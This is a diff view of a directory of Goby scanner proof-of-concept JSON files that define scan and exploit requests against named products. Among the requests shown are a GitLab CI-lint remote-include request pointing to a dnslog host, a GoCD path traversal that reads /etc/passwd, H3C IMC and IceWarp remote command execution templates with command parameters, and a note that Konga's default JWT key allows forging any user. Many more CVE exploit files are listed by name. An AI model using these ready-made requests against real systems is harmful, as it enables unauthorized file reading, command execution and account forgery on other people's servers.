	33	+	"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9",
	34	+	"Content-Length": ""
43	35		},
44	36		"data_type": "text",
45	37		"data": "{\"include_merged_yaml\":true,\"content\":\"include:\\n remote: http://test.dnslog.cn/api/v1/targets?test.yml\",\"wglt1cskpv\":\"=\"}"
		skipped 19 lines
65	57		]
66	58		},
67	59		"SetVariable": []
68		-	},
69		-	{
70		-	"Request": {
71		-	"method": "POST",
72		-	"uri": "/api/v4/ci/lint?include_merged_yaml=true",
73		-	"follow_redirect": true,
74		-	"header": {
75		-	"Content-Type": "application/json"
76		-	},
77		-	"data_type": "text",
78		-	"data": "{\"content\": \"include:\\n remote: http://127.0.0.1:9100/test.yml\"}",
79		-	"set_variable": []
80		-	},
81		-	"ResponseTest": {
82		-	"type": "group",
83		-	"operation": "AND",
84		-	"checks": [
85		-	{
86		-	"type": "item",
87		-	"variable": "$code",
88		-	"operation": "==",
89		-	"value": "200",
90		-	"bz": ""
91		-	},
92		-	{
93		-	"type": "item",
94		-	"variable": "$body",
95		-	"operation": "contains",
96		-	"value": "does not have valid YAML syntax",
97		-	"bz": ""
98		-	}
99		-	]
100		-	},
101		-	"SetVariable": [
102		-	"output\|lastbody\|regex\|"
103		-	]
104	60		}
105	61		],
106		-	"ExploitSteps": [
	62	+	"ExploitSteps": [
107	63		"AND",
108	64		{
109	65		"Request": {
		skipped 2 lines
112	68		"follow_redirect": false,
113	69		"header": {
114	70		"Content-Type": "application/json",
115		-	"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9"
	71	+	"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9",
	72	+	"Content-Length": ""
116	73		},
117	74		"data_type": "text",
118	75		"data": "{\"include_merged_yaml\":true,\"content\":\"include:\\n remote: http://{{{URL}}}/api/v1/targets?test.yml\",\"wglt1cskpv\":\"=\"}"
		skipped 19 lines
138	95		]
139	96		},
140	97		"SetVariable": [
141		-	"output\|lastbody\|undefined\|undefined"
142		-	]
	98	+	"output\|lastbody"
	99	+	]
143	100		}
144	101		],
145		-	"PostTime": "0000-00-00 00:00:00",
146		-	"GobyVersion": "0.0.0"
	102	+	"PostTime": "2021-07-01 20:34:22",
	103	+	"GobyVersion": "1.8.268"
147	104		}

lib/goby/goby_pocs/Gitlab_RCE_CVE_2021_22205.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

■ ■ ■ ■ ■ ■

lib/goby/goby_pocs/GoCD_Arbitrary_file_reading_CVE_2021_43287.json

1	+	{
2	+	"Name": "GoCD Arbitrary file reading CVE-2021-43287",
3	+	"Level": "3",
4	+	"Tags": [
5	+	"fileread"
6	+	],
7	+	"GobyQuery": "title=\"Login - Go\"",
8	+	"Description": "",
9	+	"Product": "",
10	+	"Homepage": "https://gobies.org/",
11	+	"Author": "[email protected]",
12	+	"Impact": "",
13	+	"Recommendation": "",
14	+	"References": [
15	+	"https://gobies.org/"
16	+	],
17	+	"HasExp": true,
18	+	"ExpParams": null,
19	+	"ExpTips": {
20	+	"Type": "",
21	+	"Content": ""
22	+	},
23	+	"ScanSteps": [
24	+	"AND",
25	+	{
26	+	"Request": {
27	+	"method": "GET",
28	+	"uri": "/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd",
29	+	"follow_redirect": true,
30	+	"header": null,
31	+	"data_type": "text",
32	+	"data": "",
33	+	"set_variable": []
34	+	},
35	+	"ResponseTest": {
36	+	"type": "group",
37	+	"operation": "AND",
38	+	"checks": [
39	+	{
40	+	"type": "item",
41	+	"variable": "$code",
42	+	"operation": "==",
43	+	"value": "200",
44	+	"bz": ""
45	+	},
46	+	{
47	+	"type": "item",
48	+	"variable": "$body",
49	+	"operation": "contains",
50	+	"value": "root",
51	+	"bz": ""
52	+	}
53	+	]
54	+	},
55	+	"SetVariable": [
56	+	"output\|lastbody\|regex\|"
57	+	]
58	+	}
59	+	],
60	+	"ExploitSteps": [
61	+	"AND",
62	+	{
63	+	"Request": {
64	+	"method": "GET",
65	+	"uri": "/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd",
66	+	"follow_redirect": true,
67	+	"header": null,
68	+	"data_type": "text",
69	+	"data": "",
70	+	"set_variable": []
71	+	},
72	+	"ResponseTest": {
73	+	"type": "group",
74	+	"operation": "AND",
75	+	"checks": [
76	+	{
77	+	"type": "item",
78	+	"variable": "$code",
79	+	"operation": "==",
80	+	"value": "200",
81	+	"bz": ""
82	+	},
83	+	{
84	+	"type": "item",
85	+	"variable": "$body",
86	+	"operation": "contains",
87	+	"value": "root",
88	+	"bz": ""
89	+	}
90	+	]
91	+	},
92	+	"SetVariable": [
93	+	"output\|lastbody\|regex\|"
94	+	]
95	+	}
96	+	],
97	+	"PostTime": "2022-07-15 22:05:52",
98	+	"GobyVersion": "1.9.323"
99	+	}

lib/goby/goby_pocs/GoCD_Unauthorized_Path_Traversal_CVE_2021_43287.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Grafana_Angularjs_Rendering_XSS_CVE_2021_41174.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Grafana_Arbitrary_file_read.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Grafana_Plugins_Arbitrary_File_Read.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Grafana_v8.x_Arbitrary_File_Read_CVE_2021_43798.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

■ ■ ■ ■ ■ ■

lib/goby/goby_pocs/H3C_IMC_RCE.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

1	1		{
2		-	"Name": "H3C IMC RCE",
	2	+	"Name": "H3C IMC远程命令执行",
3	3		"Level": "3",
4		-	"Tags": [
5		-	"rce"
6		-	],
	4	+	"Tags": [],
7	5		"GobyQuery": "product=\"H3C-iMC\"",
8		-	"Description": "H3C IMC",
9		-	"Product": "H3C IMC",
	6	+	"Description": "",
	7	+	"Product": "H3C iMC 智能管理中心平台",
10	8		"Homepage": "http://www.h3c.com/cn/Products___Technology/Products/H3C_Soft/IT_Business/Resource/iMC_Flat",
11		-	"Author": "",
12		-	"Impact": "A vulnerability in H3C IMC allows remote unauthenticated attackers to cause the remote web application to execute arbitrary commands via the 'dynamiccontent.properties.xhtml' endpoint.",
13		-	"Recommendation": "",
	9	+	"Author": "ying",
	10	+	"Impact": "",
	11	+	"Recommandation": "",
14	12		"References": [
15		-	"https://mp.weixin.qq.com/s/BP9_H3lpluqIwL5OMIJlIw",
16	13		"https://www.t00ls.net/articles-60979.html"
17	14		],
18		-	"HasExp": true,
19		-	"ExpParams": [
20		-	{
21		-	"Name": "Cmd",
22		-	"Type": "input",
23		-	"Value": "whoami"
24		-	}
25		-	],
26		-	"ExpTips": {
27		-	"Type": "",
28		-	"Content": ""
29		-	},
	15	+	"HasExp": true,
	16	+	"ExpParams": [
	17	+	{
	18	+	"name": "Cmd",
	19	+	"type": "input",
	20	+	"value": "whoami",
	21	+	"show": ""
	22	+	}
	23	+	],
30	24		"ScanSteps": [
31	25		"AND",
32	26		{
		skipped 30 lines
63	57		},
64	58		"SetVariable": []
65	59		}
66		-	],
67		-	"ExploitSteps": [
	60	+	],
	61	+	"ExploitSteps": [
68	62		"AND",
69	63		{
70	64		"Request": {
		skipped 28 lines
99	93		]
100	94		},
101	95		"SetVariable": [
102		-	"output\|lastbody\|undefined\|undefined"
103		-	]
	96	+	"output\|lastbody"
	97	+	]
104	98		}
105		-	],
106		-	"PostTime": "0000-00-00 00:00:00",
107		-	"GobyVersion": "0.0.0"
	99	+	],
	100	+	"PostTime": "2021-05-28 10:06:39",
	101	+	"GobyVersion": "1.8.268"
108	102		}

lib/goby/goby_pocs/H5S_CONSOLE_Video_Platform_GetSrc_Information_Leak_CNVD_2021_25919.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/H5S_Video_Platform_GetUserInfo_Info_Leak_CNVD_2021_35567.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/H5S_video_platform_GetSrc_information_leakage.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/H5S_video_platform_GetUserInfo_Account_password_leakage.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/HIKVISION 视频编码设备接入网关任意文件下载.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/HIKVISION.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/HIKVISION_Video_coding_equipment_Download_any_file.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Hikvision_RCE_CVE_2021_36260.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Hikvision_Unauthenticated_RCE_CVE-2021-36260.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Hikvision_Video_Encoding_Device_Access_Gateway_Any_File_Download.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/HotelDruid_Hotel_Management_Software_v3.0.3_XSS_CVE_2022_26564.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Hsmedia_Hgateway_Default_account.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/IFW8_Enterprise_router_Password_leakage_.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/IFW8_Router_ROM_v4.31_Credential_Discovery_CVE_2019_16313.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

■ ■ ■ ■ ■ ■

lib/goby/goby_pocs/IRDM4000_Smart_station_Unauthorized_access.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

1	1		{
2	2		"Name": "IRDM4000 Smart station Unauthorized access",
3	3		"Level": "2",
4		-	"Tags": [
5		-	"unauthorized access"
6		-	],
	4	+	"Tags": [],
7	5		"GobyQuery": "body=\"iRDM4000智慧站房在线监管\"",
8		-	"Description": "IRDM4000 Smart station",
	6	+	"Description": "IRDM4000 unauthorized access vulnerability of userId=0",
9	7		"Product": "IRDM4000 Smart station",
10		-	"Homepage": "http://www.houtian-hb.com/",
11		-	"Author": "",
12		-	"Impact": "IRDM4000 unauthorized access vulnerability of userId=0",
	8	+	"Homepage": "http://www.houtian-hb.com",
	9	+	"Author": "gobysec@gmail.com",
	10	+	"Impact": "",
13	11		"Recommendation": "",
14		-	"References": [],
15		-	"HasExp": false,
	12	+	"References": [
	13	+	"https://gobies.org/"
	14	+	],
	15	+	"HasExp": true,
16	16		"ExpParams": null,
17	17		"ExpTips": {
18	18		"Type": "",
		skipped 45 lines
64	64		]
65	65		}
66	66		],
67		-	"PostTime": "0000-00-00 00:00:00",
68		-	"GobyVersion": "0.0.0"
	67	+	"ExploitSteps": [
	68	+	"AND",
	69	+	{
	70	+	"Request": {
	71	+	"method": "GET",
	72	+	"uri": "/test.php",
	73	+	"follow_redirect": true,
	74	+	"header": null,
	75	+	"data_type": "text",
	76	+	"data": "",
	77	+	"set_variable": []
	78	+	},
	79	+	"ResponseTest": {
	80	+	"type": "group",
	81	+	"operation": "AND",
	82	+	"checks": [
	83	+	{
	84	+	"type": "item",
	85	+	"variable": "$code",
	86	+	"operation": "==",
	87	+	"value": "200",
	88	+	"bz": ""
	89	+	},
	90	+	{
	91	+	"type": "item",
	92	+	"variable": "$body",
	93	+	"operation": "contains",
	94	+	"value": "test",
	95	+	"bz": ""
	96	+	}
	97	+	]
	98	+	},
	99	+	"SetVariable": [
	100	+	"output\|lastbody\|regex\|"
	101	+	]
	102	+	}
	103	+	],
	104	+	"PostTime": "2021-10-26 10:55:38",
	105	+	"GobyVersion": "1.9.304"
69	106		}

■ ■ ■ ■ ■ ■

lib/goby/goby_pocs/IceWarp_WebClient_basic_RCE.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

1	1		{
2	2		"Name": "IceWarp WebClient basic RCE",
3	3		"Level": "3",
4		-	"Tags": [
5		-	"rce"
6		-	],
	4	+	"Tags": [],
7	5		"GobyQuery": "body=\"Powered by IceWarp\"",
8		-	"Description": "IceWarp",
9		-	"Product": "IceWarp",
10		-	"Homepage": "http://www.icewarp.cn/",
11		-	"Author": "",
12		-	"Impact": "IceWarp WebClient basic RCE",
13		-	"Recommendation": "",
	6	+	"Description": "",
	7	+	"Product": "",
	8	+	"Homepage": "https://gobies.org/",
	9	+	"Author": "luckying",
	10	+	"Impact": "",
	11	+	"Recommandation": "",
14	12		"References": [
15		-	"https://www.pwnwiki.org/index.php?title=IceWarp_WebClient_basic_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E"
	13	+	"https://gobies.org/"
16	14		],
17		-	"HasExp": true,
18		-	"ExpParams": [
19		-	{
20		-	"Name": "cmd",
21		-	"Type": "input",
22		-	"Value": "ipconfig"
23		-	}
24		-	],
25		-	"ExpTips": {
26		-	"Type": "",
27		-	"Content": ""
28		-	},
	15	+	"HasExp": true,
	16	+	"ExpParams": [
	17	+	{
	18	+	"name": "cmd",
	19	+	"type": "input",
	20	+	"value": "ipconfig",
	21	+	"show": ""
	22	+	}
	23	+	],
29	24		"ScanSteps": [
30	25		"AND",
31	26		{
		skipped 23 lines
55	50		"SetVariable": []
56	51		}
57	52		],
58		-	"ExploitSteps": [
	53	+	"ExploitSteps": [
59	54		"AND",
60	55		{
61	56		"Request": {
		skipped 20 lines
82	77		]
83	78		},
84	79		"SetVariable": [
85		-	"output\|lastbody\|undefined\|undefined"
86		-	]
	80	+	"output\|lastbody"
	81	+	]
87	82		}
88	83		],
89		-	"PostTime": "0000-00-00 00:00:00",
90		-	"GobyVersion": "0.0.0"
	84	+	"PostTime": "2021-06-19 13:19:47",
	85	+	"GobyVersion": "1.8.268"
91	86		}

lib/goby/goby_pocs/JQuery_1.7.2Version_site_foreground_arbitrary_file_download.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/JQuery_1.7.2_Filedownload.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Jellyfin_10.7.0_Unauthenticated_Abritrary_File_Read_CVE_2021_21402.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Jellyfin_10.7.2_SSRF_CVE-2021-29490.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Jellyfin_SSRF_CVE_2021_29490.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Jellyfin_prior_to_10.7.0_Unauthenticated_Arbitrary_File_Read_CVE_2021_21402.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Jetty_WEB_INF_FileRead_CVE_2021_28169.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Jetty_WEB_INF_FileRead_CVE_2021_34429.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/JinHe_OA_C6_Default_password.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/JinHe_OA_C6_download.jsp_Arbitrary_fileread.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/JingHe_OA_C6_Default_password.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Jinher_OA_C6_download.jsp_Arbitrary_file_read.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Jinshan_V8.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Jitong_EWEBS_Fileread.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Jitong_EWEBS_arbitrary_file_read.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

■ ■ ■ ■ ■ ■

lib/goby/goby_pocs/Jitong_EWEBS_phpinfo_leak.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

1	1		{
2		-	"Name": "Jitong EWEBS phpinfo leak",
3		-	"Level": "0",
4		-	"Tags": [
5		-	"infoleak"
6		-	],
	2	+	"Name": "极通EWEBSphpinfo泄露",
	3	+	"Level": "3",
	4	+	"Tags": [],
7	5		"GobyQuery": "body=\"极通软件\"",
8	6		"Description": "",
9		-	"Product": "Jitong EWEBS",
10		-	"Homepage": "http://www.n-soft.com.cn/",
11		-	"Author": "",
12		-	"Impact": "Jitong EWEBS phpinfo leak",
13		-	"Recommendation": "",
14		-	"References": [],
15		-	"HasExp": true,
16		-	"ExpParams": null,
17		-	"ExpTips": {
18		-	"Type": "",
19		-	"Content": ""
20		-	},
	7	+	"Product": "",
	8	+	"Homepage": "https://gobies.org/",
	9	+	"Author": "gobysec@gmail.com",
	10	+	"Impact": "",
	11	+	"Recommandation": "",
	12	+	"References": [
	13	+	"https://gobies.org/"
	14	+	],
21	15		"ScanSteps": [
22	16		"AND",
23	17		{
		skipped 1 lines
25	19		"method": "GET",
26	20		"uri": "/testweb.php",
27	21		"follow_redirect": false,
28		-	"header": null,
	22	+	"header": {},
29	23		"data_type": "text",
30	24		"data": ""
31	25		},
		skipped 13 lines
45	39		"SetVariable": []
46	40		}
47	41		],
48		-	"ExploitSteps": [
49		-	"AND",
50		-	{
51		-	"Request": {
52		-	"method": "GET",
53		-	"uri": "/testweb.php",
54		-	"follow_redirect": false,
55		-	"header": null,
56		-	"data_type": "text",
57		-	"data": "",
58		-	"set_variable": []
59		-	},
60		-	"ResponseTest": {
61		-	"type": "group",
62		-	"operation": "AND",
63		-	"checks": [
64		-	{
65		-	"type": "item",
66		-	"variable": "$body",
67		-	"operation": "contains",
68		-	"value": "PHP Version",
69		-	"bz": ""
70		-	}
71		-	]
72		-	},
73		-	"SetVariable": []
74		-	}
75		-	],
76		-	"PostTime": "0000-00-00 00:00:00",
77		-	"GobyVersion": "0.0.0"
	42	+	"PostTime": "2021-06-17 21:19:12",
	43	+	"GobyVersion": "1.8.268"
78	44		}

lib/goby/goby_pocs/KEDACOM_MTS_transcoding_server_Arbitrary_file_download_CNVD_2020_48650.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/KEDACOM_MTS_transcoding_server_Fileread_CNVD_2020_48650.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Kingsoft_V8_Arbitrary_file_read.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Kingsoft_V8_Default_weak_password.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Kingsoft_V8_Terminal_Security_System_Default_Login_CNVD_2021_32425.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Kingsoft_V8_Terminal_Security_System_Fileread.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

■ ■ ■ ■ ■ ■

lib/goby/goby_pocs/Konga_Default_JWT_KEY.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

		skipped 3 lines
4	4		"Tags": [
5	5		"defaultaccount"
6	6		],
7		-	"GobyQuery": "title=\"Konga\" \|\| body=\"window.konga_version\"",
8		-	"Description": "Konga offers the tools you need to manage your Kong cluster with ease.",
	7	+	"GobyQuery": "(title==\"Konga\" \| body=\"window.konga_version\")",
	8	+	"Description": "Konga JWT默认key为oursecret，可伪造任意用户权限。",
9	9		"Product": "Konga",
10	10		"Homepage": "https://github.com/pantsel/konga",
11		-	"Author": "",
12		-	"Impact": "The default key of Konga JWT is oursecret, which can forge arbitrary user permissions.",
	11	+	"Author": "aetkrad",
	12	+	"Impact": "",
13	13		"Recommendation": "",
14	14		"References": [
15	15		"https://mp.weixin.qq.com/s/8guU2hT3wE2puEztdGqZQg"
		skipped 96 lines
112	112		]
113	113		}
114	114		],
115		-	"PostTime": "0000-00-00 00:00:00",
116		-	"GobyVersion": "0.0.0"
	115	+	"PostTime": "2021-12-03 18:50:39",
	116	+	"GobyVersion": "1.9.310"
117	117		}

lib/goby/goby_pocs/Kyan.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Kyan_Account_password_leak.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Kyan_design_account_password_disclosure.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Kyan_network_monitoring_device_account_password_leak.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Kyan_network_monitoring_device_run.php_RCE.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

lib/goby/goby_pocs/Kyan_run.php_RCE.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644

Content is identical

up lib/goby 2022-09-02